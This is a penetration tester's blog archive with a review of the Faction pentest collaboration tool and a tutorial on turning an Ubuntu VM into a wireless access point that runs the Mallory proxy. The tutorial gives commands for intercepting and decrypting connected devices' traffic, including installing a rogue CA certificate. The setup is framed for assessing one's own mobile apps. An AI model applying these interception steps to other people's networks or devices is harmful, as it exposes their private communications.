Confessions of a Penetration Tester<br />
This blog is mostly for my own archiving of vulnerabilities I have discovered and defensive techniques. Hopefully it will serve others as well.<br />
<br />
<h2>Pen testing Collaboration with FuseSoft Faction</h2>Published 2016-12-02<br />
If you have not checked out <a href="https://www.fusesoftsecurity.com/">FuseSoft Faction</a> and you're on a web and mobile application security penetration testing team, you ought to give it a look. The project is currently in beta and free to download and try right now, as long as you're willing to provide feedback.<br />
<br />
<a href="https://www.fusesoftsecurity.com/">FuseSoft</a> develops assessment collaboration, vulnerability management, and assessment automation software. The idea is to automate much of the overhead of penetration testing teams so they can get back to finding more bugs instead of writing reports, managing assessment scheduling, keeping up with retesting, and so on. Collaboration and workflow enhancements are built into Burp Suite, and in many cases you can enter all your findings right from Burp and never have to log into the actual site. Default vulnerability information is pre-populated for you by the tool, so you don't have to rewrite or copy/paste descriptions and remediation recommendations for issues like XSS or SQLi that you find assessment after assessment.<br />
<br />
Below is the main dashboard. Assessors have access to all of their current assessment and retest queues. There is even a "Your Week" box at the bottom that holds your current assessment scope and information. The idea is that all the information is pre-populated and ready for you to start hacking as soon as you log in on Monday morning. It even displays the other assessors who are working with you that week.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iQy6bOmY0BI/WEHimt5lGHI/AAAAAAAAEz8/qaTYj7CXDuIjf9s4CKRrWSXRKHePKx06wCLcB/s1600/dashboard.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="475" src="https://1.bp.blogspot.com/-iQy6bOmY0BI/WEHimt5lGHI/AAAAAAAAEz8/qaTYj7CXDuIjf9s4CKRrWSXRKHePKx06wCLcB/s640/dashboard.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can open an assessment to view the details and add vulnerabilities. There is a running total of all issues discovered at the top of the screen. Entering a common vulnerability pre-populates the boilerplate text.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.fusesoftsecurity.com/img/ss/vulnEntry2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://www.fusesoftsecurity.com/img/ss/vulnEntry2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Below shows how the vulnerability entry works from the web site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-O22eQ7kLGL8/WEHjz2ltvVI/AAAAAAAAE0M/RGmYSq122AIV4O_FE-9FGnsAHXPjLnnGQCLcB/s1600/vuln%2Bentry.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://4.bp.blogspot.com/-O22eQ7kLGL8/WEHjz2ltvVI/AAAAAAAAE0M/RGmYSq122AIV4O_FE-9FGnsAHXPjLnnGQCLcB/s640/vuln%2Bentry.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But you're not restricted to using the website to enter vulnerabilities. There is some pretty robust Burp Suite integration. You can add vulnerabilities and extracts of the vulnerable payloads just by selecting response text and right-clicking. It has the option to upload the request and/or response, as well as to snip out cookie information so that session cookies don't end up in the evidence. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For example, say we found XSS on a site and have fully exploited it in Burp Repeater. Just right-click, search for the XSS default vulnerability, and add exploit steps, all from inside Burp.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XUXKNmk6Lcg/WEHimKN3VEI/AAAAAAAAEzg/hIGs48Bf3osE40XPdZpMND8aNyjIF3KpwCEw/s1600/Add%2BFrom%2Bburp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://2.bp.blogspot.com/-XUXKNmk6Lcg/WEHimKN3VEI/AAAAAAAAEzg/hIGs48Bf3osE40XPdZpMND8aNyjIF3KpwCEw/s640/Add%2BFrom%2Bburp.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
The message box supports Markdown syntax, so you can do some light report editing right from inside Burp. The result will look like the following screenshot in the web version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-pOEkPmj0H34/WEHimkmYLrI/AAAAAAAAEz4/XiRWqUU4RBEATi7K5mpznM_3-76Wn65zgCEw/s1600/burp%2Bto%2Breport.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://4.bp.blogspot.com/-pOEkPmj0H34/WEHimkmYLrI/AAAAAAAAEz4/XiRWqUU4RBEATi7K5mpznM_3-76Wn65zgCEw/s640/burp%2Bto%2Breport.PNG" width="640" /></a></div>
<br />
Notice that our exploit steps have been converted to rich text, we have an example payload, and we have the full request but only the selected portion of the response. You can then perform further edits, like highlighting the specific exploit in red so that it's easier to identify.<br />
<br />
All of this goes from the WYSIWYG editor to DOCX reports. Below is an example extract of the MS Word Report.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-WJNJRwOtS6c/WEHimnnK6II/AAAAAAAAE0A/YB1iZ5l4KSsWLf8zTVFPj6VSH4fLiPbWwCEw/s1600/generated%2Breport.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-WJNJRwOtS6c/WEHimnnK6II/AAAAAAAAE0A/YB1iZ5l4KSsWLf8zTVFPj6VSH4fLiPbWwCEw/s640/generated%2Breport.PNG" width="544" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The enhancements don't stop there either. The Burp plugin updates in real time to display new findings as they are discovered. During collaborative assessments you can see what other users are finding and even replay their payloads. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Below is an example of the vulnerability history for this application that is being tested. You see all issues from previous assessments and the new issues that your fellow assessors are finding. If you click any vulnerability in the table you will be presented with the full description and exploit steps. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The Burp plugin detects whether a stored payload is a valid request that can be replayed and creates a link above the request, so the current assessor can replay it with a single click. Notice the 'Send to Repeater' hyperlink above the request in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-XdnoFlRODnE/WEHimSv7j-I/AAAAAAAAEzo/k1nj8t2jkI0jaCnrs0lS1V8o2CLsFLKdQCEw/s1600/Exploit%2BDetails.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://1.bp.blogspot.com/-XdnoFlRODnE/WEHimSv7j-I/AAAAAAAAEzo/k1nj8t2jkI0jaCnrs0lS1V8o2CLsFLKdQCEw/s640/Exploit%2BDetails.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You get the same functionality with retests. If a verification retest is assigned to you, you can pull up the previous assessment's payload and replay it. This saves you the time of hunting for old Burp state files and the exact request originally used to exploit the vulnerability, and takes a lot of the guesswork out of retests. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In addition to the ability to just replay existing vulnerabilities via burp, it can also allow you to send repeater items, site maps, proxy history, and scan items directly to another user. You can right click the item or items and then just select other online users and they will show up in their Burp session. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In the below screenshot we can take this exact repeater request and send to another user's repeater.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-m3en9FWzY1k/V9bi4c_avKI/AAAAAAAAAJQ/8fClzMElFLgVsPX1P1egCTEMbss71NpAgCPcB/s1600/Repeater.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="https://2.bp.blogspot.com/-m3en9FWzY1k/V9bi4c_avKI/AAAAAAAAAJQ/8fClzMElFLgVsPX1P1egCTEMbss71NpAgCPcB/s640/Repeater.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The title you add will display as the new Repeater tab's title. This is useful when collaborating on finding a valid exploit payload. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Report Generation and Peer Reviews:</h4>
<div>
I discussed briefly the report generation features above but there is more! You can upload your current reporting templates and Faction will output reports in those styles. There is a huge selection of variables that can be inserted into your original templates that will be replaced with assessment data. </div>
<div>
<br /></div>
<div>
More information on that can be found <a href="http://blog.fusesoftsecurity.com/p/report-designer-tags.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rUTH6grHKo4/WEHimb-jfbI/AAAAAAAAE0U/4bkCdM8LAiskItQGY280ALfsjcCvzpRUwCEw/s1600/Report%2Btable.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://2.bp.blogspot.com/-rUTH6grHKo4/WEHimb-jfbI/AAAAAAAAE0U/4bkCdM8LAiskItQGY280ALfsjcCvzpRUwCEw/s640/Report%2Btable.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
After reports are generated they can be added to the Peer Review Queue. This allows your peers to make changes to your reports before you finalize them and send them out to the application owners. Reviewers can strike out text or add notes in the side margin to alert you to issues. It's the typical change-tracking functionality you would find in Word, but entirely web based. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BMaWh3EzKyQ/WEHpTkj1XdI/AAAAAAAAE0c/iUUlXJYw8YgkCJiUNk9nrqUZREfn_zasgCLcB/s1600/Tracking.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://1.bp.blogspot.com/-BMaWh3EzKyQ/WEHpTkj1XdI/AAAAAAAAE0c/iUUlXJYw8YgkCJiUNk9nrqUZREfn_zasgCLcB/s640/Tracking.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Vulnerability Management:</h4>
<div>
Vulnerability Management teams have a queue that shows all vulnerabilities assigned to them for remediation that are approaching due dates, gone past due, are out to assessors for retest, and retests that have gone past due. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Lv4n2TZF0dE/WEHim-JsebI/AAAAAAAAE0U/YsKmhm7ZzA4WeqfX1ZXRBpcwdkXG_93HACEw/s1600/remediation.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://1.bp.blogspot.com/-Lv4n2TZF0dE/WEHim-JsebI/AAAAAAAAE0U/YsKmhm7ZzA4WeqfX1ZXRBpcwdkXG_93HACEw/s640/remediation.PNG" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
They can also search for vulnerabilities and add notes about them, close them in development and/or close them in production.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Assessment Scheduling:</h4>
<div>
<a href="https://www.fusesoftsecurity.com/" target="_blank">Faction </a>keeps track of all your assessors schedules and will alert you when an assessor is not available for the next big assessment. The system shows all assessors and annotates the user as [Not Free] to ensure you don't select them when they are off on other projects. You can still add them to an assessment even if they are not free though. </div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9MG0Xqt9w-o/WEHimjl7TBI/AAAAAAAAE0U/pxuRr-DlEdUq7GyQr8dT4_FCmiMTxsHpwCEw/s1600/Who%2527s%2BFree.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://1.bp.blogspot.com/-9MG0Xqt9w-o/WEHimjl7TBI/AAAAAAAAE0U/pxuRr-DlEdUq7GyQr8dT4_FCmiMTxsHpwCEw/s640/Who%2527s%2BFree.PNG" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There are forms to update the scope for the assessment and add files that might be required. This ensures that the assessor has all the information they need when they start the assessment.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
But wait there is more:</h4>
<div>
<a href="https://www.fusesoftsecurity.com/" target="_blank">Faction </a>has a full REST API and an event-based API that allow it to integrate with other systems. The event-based API lets you write Python code that reacts to Faction events, for example to integrate with existing issue-tracking systems or application inventory systems. </div>
<div>
<br /></div>
<div>
The REST API lets you schedule assessments, query applications and vulnerabilities, and much more. The Faction Burp plugin itself was developed against this API.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XfdWNI-NR_U/WEHimDwPDPI/AAAAAAAAE0U/AddBGNLTdB8pfSeU8SXpW8s49LyInaS1ACEw/s1600/API.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://2.bp.blogspot.com/-XfdWNI-NR_U/WEHimDwPDPI/AAAAAAAAE0U/AddBGNLTdB8pfSeU8SXpW8s49LyInaS1ACEw/s640/API.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Conclusion</h4>
<div>
Check it out while it's still free. It's a fully developed assessment workflow and collaboration engine that runs on a Tomcat server with a MongoDB backend, and it is really easy to install and use. </div>
<div>
<br /></div>
<div>
Find out more at the <a href="https://www.fusesoftsecurity.com/" target="_blank">FuseSoft Security Site.</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /><h2>Mallory MiTM Proxy as a Wireless Access Point (Part 2 of 2)</h2>Published 2012-04-08<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In Part 1 we got a virtual machine partially running as a wireless access point using VirtualBox, Ubuntu, hostapd, and an <a href="http://www.amazon.com/gp/product/B005ETA5K2/ref=as_li_tf_tl?ie=UTF8&tag=autonacom-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=B005ETA5K2">Alfa wifi card.</a> In this post we will finish configuring the AP and install and configure <a href="http://intrepidusgroup.com/insight/mallory/" target="_blank">Mallory</a> to MiTM anything that connects to the virtual wireless access point.</span><br />
<br />
<br />
<h3>Create An AccessPoint Startup Script</h3><div><span style="font-family: Arial, Helvetica, sans-serif;">We have one more prerequisite before we can continue. We need to create a network bridge so the access point can share the NAT'ed Ethernet adapter. This is a Layer 2 bridge, so wireless clients end up on the same VirtualBox NAT network as eth0 and no IP forwarding or NAT rules are needed inside the guest. If it's not already installed, go ahead and install bridge-utils.</span></div><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> sudo apt-get install bridge-utils</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In your home folder create a file named startAP.sh and enter the following text.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">#!/bin/bash</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Stop NetworkManager so it does not reconfigure wlan0 and eth0 underneath us</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># (Upstart syntax, as on the Ubuntu of this post; on systemd use: systemctl stop NetworkManager)</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">stop network-manager</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Create the bridge and add the NAT'ed Ethernet adapter to it</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addbr br0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addif br0 eth0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Start the access point in the background; rtl_hostapd.conf must contain bridge=br0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">hostapd -B ./rtl_hostapd.conf > /var/log/hostapd.log</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Wait for the AP to come online before adding it to the bridge</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">sleep 5</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Add the wireless AP to the bridge (harmless if hostapd already did it via bridge=br0)</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addif br0 wlan0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># Get an address for the bridge from the VirtualBox NAT DHCP server</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">dhclient br0</span><br />
<div style="font-family: Arial, Helvetica, sans-serif;"><br />
</div><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run your script.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> chmod 755 ./startAP.sh</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo ./startAP.sh</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4HDXqBcXuGk/T4JfxtwCi1I/AAAAAAAACt0/d6tdyHgDycE/s1600/AP+Running.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="http://2.bp.blogspot.com/-4HDXqBcXuGk/T4JfxtwCi1I/AAAAAAAACt0/d6tdyHgDycE/s320/AP+Running.jpg" width="320" /></a></div><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div><br />
<br />
<span style="color: red; font-family: Arial, Helvetica, sans-serif;">*NOTE: ensure that bridge=br0 is present in your hostapd config file (the rtl_hostapd.conf from Part 1). hostapd uses it to attach wlan0 to the bridge when the AP comes up; without it, clients may associate but never get an address or reach eth0. </span><br />
<span style="color: red; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You should now have a fully configured wireless access point. Try to get your mobile device or another computer to connect to the internet through it. In some cases DHCP will not work through the bridge and you will have to configure a static address on the device. The VirtualBox NAT network defaults to 10.0.2.0/24 with the gateway at 10.0.2.2, so something like the following usually works: </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">IP Address: 10.0.2.17 </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">SubnetMask: 255.255.255.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Router: 10.0.2.2</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">DNS: 8.8.8.8</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3>Mallory Installation Steps</h3><span style="font-family: Arial, Helvetica, sans-serif;">In the virtual machine that was created in Part 1, drop to a terminal and install Mercurial before anything else.</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo apt-get install mercurial</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now decide on a directory where you want to install and run Mallory. I like having it in my home directory, so that's where the rest of this tutorial will reference it.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd ~<br />
> hg clone https://bitbucket.org/IntrepidusGroup/mallory<br />
> cd mallory<br />
> sudo ./mallory_install.sh<br />
> sudo ./mallory_install.sh</span><span style="background-color: white; line-height: 1.5;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">The first time you run the installation script it will ask you to verify that you have an internet connection. Once you verify, run the same script again and it will download and install all of the dependencies. (Bitbucket dropped Mercurial hosting in 2020, so the hg clone URL above may no longer resolve; look for a current mirror of the Mallory repository.)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Let's MiTM some traffic!</span></span></h3><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Finally the fun happens! We need to start the Mallory core process and then the Mallory GUI while the AP is running.</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> cd ~/mallory/current/src</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> sudo python ./mallory.py</span></span><br />
<span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;">Open another terminal, change to the same directory, and start the GUI:</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> cd ~/mallory/current/src</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> sudo python ./launchgui.py</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;">Once the GUI comes up, select the Interfaces tab, ensure that br0 is checked for "Perform MiTM" and eth0 is checked for "Outbound Interface", and click Apply.</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-REVLbVSDEzQ/T4JiyKanXhI/AAAAAAAACt8/EUzTZWq-Zjo/s1600/inferface_config.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-REVLbVSDEzQ/T4JiyKanXhI/AAAAAAAACt8/EUzTZWq-Zjo/s320/inferface_config.jpg" width="224" /></a></div><span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Select the Protocols tab and uncomment the line starting with ssl_2 and Click Apply.</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-UDQr0e4pVpM/T4JjEsxxpxI/AAAAAAAACuE/kFW_w7iIRaM/s1600/SSL+Config.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-UDQr0e4pVpM/T4JjEsxxpxI/AAAAAAAACuE/kFW_w7iIRaM/s320/SSL+Config.jpg" width="268" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Click the Rules tab and ensure that Debug All is the current rule; if not, create it by copying the settings in the following screenshot.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-VeyTtAhN33o/T4JjdP6Og4I/AAAAAAAACuM/A_xfivEzV5A/s1600/debug_all.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="http://4.bp.blogspot.com/-VeyTtAhN33o/T4JjdP6Og4I/AAAAAAAACuM/A_xfivEzV5A/s320/debug_all.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="color: #525252; font-family: 'Courier New', Courier, monospace;"><span style="line-height: 24px;"><br />
</span></span><br />
<br />
<div><span style="font-family: Arial, Helvetica, sans-serif;">Now click on Streams and click "Intercept" and "AutoSend". After this you can navigate to some site in your phone's browser and you should see the streams populating the screen.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-qpq1q-k9kys/T4JktUJDT7I/AAAAAAAACuU/V5PTWOQaK6I/s1600/Streams.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-qpq1q-k9kys/T4JktUJDT7I/AAAAAAAACuU/V5PTWOQaK6I/s320/Streams.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Additional Set Up</span></h3><h4><span style="font-family: Arial, Helvetica, sans-serif;">Strip Encoding</span></h4><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div><span style="font-family: Arial, Helvetica, sans-serif;">There are a few things you're going to want to do here to really MiTM some traffic. First you're going to want to create a rule that strips the Accept-Encoding header from requests, since Mallory does not automatically decode compressed responses the way Burp Suite does. </span></div><div><ol><li><span style="font-family: Arial, Helvetica, sans-serif;">Select the Rules tab.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Set the Name to "Strip Encoding".</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Direction C2S (Client to Server)</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The Type is Muck</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Enter </span><span style="font-family: 'Courier New', Courier, monospace;">Accept-Encoding: gzip.*/Header: fake/1</span><span style="font-family: Arial, Helvetica, sans-serif;"> into the Muck textbox.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Passthru = yes</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Move "Strip Encoding" to the top.</span></li>
</ol><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-90HsESk_bQg/T4JoWeOSETI/AAAAAAAACuc/QMavhzumEx8/s1600/Strip+Encoding.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://2.bp.blogspot.com/-90HsESk_bQg/T4JoWeOSETI/AAAAAAAACuc/QMavhzumEx8/s320/Strip+Encoding.jpg" width="320" /></a></div><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div></div><span style="font-family: Arial, Helvetica, sans-serif;">Now Mallory will send "Header: fake" instead of "Accept-Encoding: gzip, deflate" on HTTP requests, which prevents the server from sending a compressed response (i.e. you can now read the responses in Mallory's Streams tab).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Install the CA Cert on a mobile device</span></h3><span style="font-family: Arial, Helvetica, sans-serif;">The next thing you will want to do is add Mallory's CA cert to your device. This is how you intercept SSL traffic without the mobile device showing SSL warnings; some apps will not connect at all if the server cert is not signed by a CA the device trusts. </span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The Mallory CA is located in ~/mallory/current/src/ca/ca.cer. If you're intercepting traffic on iOS you can just email this cert to yourself, open the attachment with the iOS mail client, and select Install. Now you can intercept SSL traffic with iOS apps that do certificate checks (and almost all do). On Android devices you need to install this certificate into /etc/security/cacerts.bks. You will need to jailbreak the device to do this and you will need the Android SDK. There are already a lot of articles on this so I'm not going to go into detail here. Maybe in another post.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">That's it. Good luck! :)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-68722780208117722012012-04-07T00:12:00.001-05:002012-04-08T22:27:51.319-05:00Mallory MiTM Proxy as a Wireless Access Point (Part 1 of 2)<a href="http://intrepidusgroup.com/insight/mallory/" target="_blank">Mallory MiTM Proxy</a> is a great tool if you need to intercept and modify non-HTTP connections. I generally use this tool while doing mobile assessments to get an idea of all the connections the device is performing in the background. It allows you to intercept most types of TCP and UDP connections and has special translators for HTTP protocols. I still prefer using BurpSuite for HTTP protocols, but since Mallory understands protocols that BurpSuite does not, it remains a great tool to have on your side.<br />
<br />
There are a ton of ways to set up and configure Mallory. The easiest is as a VPN, but I feel the wireless access point is more robust, and it is easier to get your devices proxying through it once you have it set up.<br />
<br />
<h3>Create a Virtual Machine Wireless Access Point</h3>I created a new Ubuntu virtual machine to act as my MiTM wireless access point, with VirtualBox as the host. I like the virtual machine approach because I can save the state and start anew with each new assessment, and I can run it on my laptop, which makes my mobile environment more portable. This requires a USB wireless card that runs in Ubuntu and can be put into monitor mode. The Alfa cards work great for this: they are high power (mine is 2000mW) and fairly inexpensive.<br />
<br />
<br />
<br />
<br />
